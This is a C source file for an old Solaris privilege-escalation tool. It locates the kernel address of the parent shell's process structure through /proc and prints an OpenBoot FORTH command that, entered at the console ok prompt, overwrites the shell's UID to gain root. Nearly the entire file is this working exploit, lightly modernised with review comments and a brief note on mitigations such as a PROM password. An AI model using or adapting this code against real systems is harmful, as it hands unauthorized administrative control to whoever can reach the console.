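/* eeprom_hack.c johnc@grok.org.uk 23rd July 2003 */
/*
 * Looks up the kernel address of the parent process (expected to be the
 * user's shell) through /proc/<ppid>/psinfo and prints an OpenBoot FORTH
 * command that patches the UID field of that process's credential
 * structure from the PROM `ok` prompt.
 *
 * Defender's note: the printed command is only usable by someone who can
 * reach the OpenBoot `ok` prompt on the system console.  A PROM password
 * (eeprom security-mode) and restricted physical / serial console access
 * close that path; the program itself needs no privilege to run.
 *
 * NOTE(review): the header names were lost when this listing was
 * extracted.  The list below is what the code needs (struct proc and
 * p_cred, struct cred and cr_uid, struct psinfo and PR_MODEL_*, open/read,
 * printf/exit) -- confirm against the original.  struct cred's layout is
 * Solaris-release specific.
 */
#include <sys/types.h>
#include <sys/proc.h>      /* struct proc, p_cred */
#include <sys/cred.h>      /* struct cred, cr_uid */
#include <sys/procfs.h>    /* struct psinfo, PR_MODEL_* */
#include <fcntl.h>
#include <unistd.h>
#include <stddef.h>        /* offsetof */
#include <stdio.h>
#include <stdlib.h>

/*
 * Entry point.  Takes no options; argc/argv are unused.
 * Returns 0 on success; exits with status 1 if psinfo cannot be read, the
 * data model does not match this binary, or pr_addr is null.
 */
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;

    /* Offset of the credential pointer inside the proc structure, and of
     * the UID inside the credential structure.  offsetof() replaces the
     * original pointer-difference arithmetic on uninitialised locals. */
    const size_t cred_off = offsetof(struct proc, p_cred);
    const size_t uid_off = offsetof(struct cred, cr_uid);

    /* Get parent PID and then the base address of its proc structure. */
    pid_t parent = getppid();
    char filename[32];
    /* pid_t is not necessarily unsigned int; cast to match the %u. */
    snprintf(filename, sizeof(filename), "/proc/%u/psinfo", (unsigned)parent);

    int psfile = open(filename, O_RDONLY, 0);
    if (psfile < 0) {
        perror(filename);
        exit(1);
    }

    struct psinfo psinfo_struct;
    ssize_t got = read(psfile, &psinfo_struct, sizeof(psinfo_struct));
    if (got < 0) {
        perror("read");
        exit(1);
    }
    /* A short read is not an errno condition; the original reported it
     * through perror() with whatever errno happened to hold. */
    if ((size_t)got != sizeof(psinfo_struct)) {
        fprintf(stderr, "ERROR: short read from %s.\n", filename);
        exit(1);
    }
    close(psfile);

#ifdef PR_MODEL_NATIVE
    /* The structure offsets above are only meaningful if this binary was
     * built for the same data model (ILP32 / LP64) as the target process. */
    if (psinfo_struct.pr_dmodel != PR_MODEL_NATIVE) {
        fprintf(stderr,
                "ERROR: Target process is %s but this binary is %s.\n"
                "Recompile natively on the target machine.\n",
                psinfo_struct.pr_dmodel == PR_MODEL_LP64 ? "64-bit" : "32-bit",
                PR_MODEL_NATIVE == PR_MODEL_LP64 ? "64-bit" : "32-bit");
        exit(1);
    }
#endif

    /* pr_addr is the kernel address of the process's proc structure. */
    uintptr_t target = psinfo_struct.pr_addr;
    if (!target) {
        fprintf(stderr, "ERROR: pr_addr is null.\n");
        exit(1);
    }

    printf("Shell with PID %ld found at address 0x%lx\n",
           (long)parent, (unsigned long)target);

    /* Print the FORTH command for this architecture.  All three values are
     * cast to unsigned long to match %lx exactly. */
    printf("\nhex 0 %lx %lx + x@ %lx + l!\n\n",
           (unsigned long)target, (unsigned long)cred_off,
           (unsigned long)uid_off);

    return 0;
}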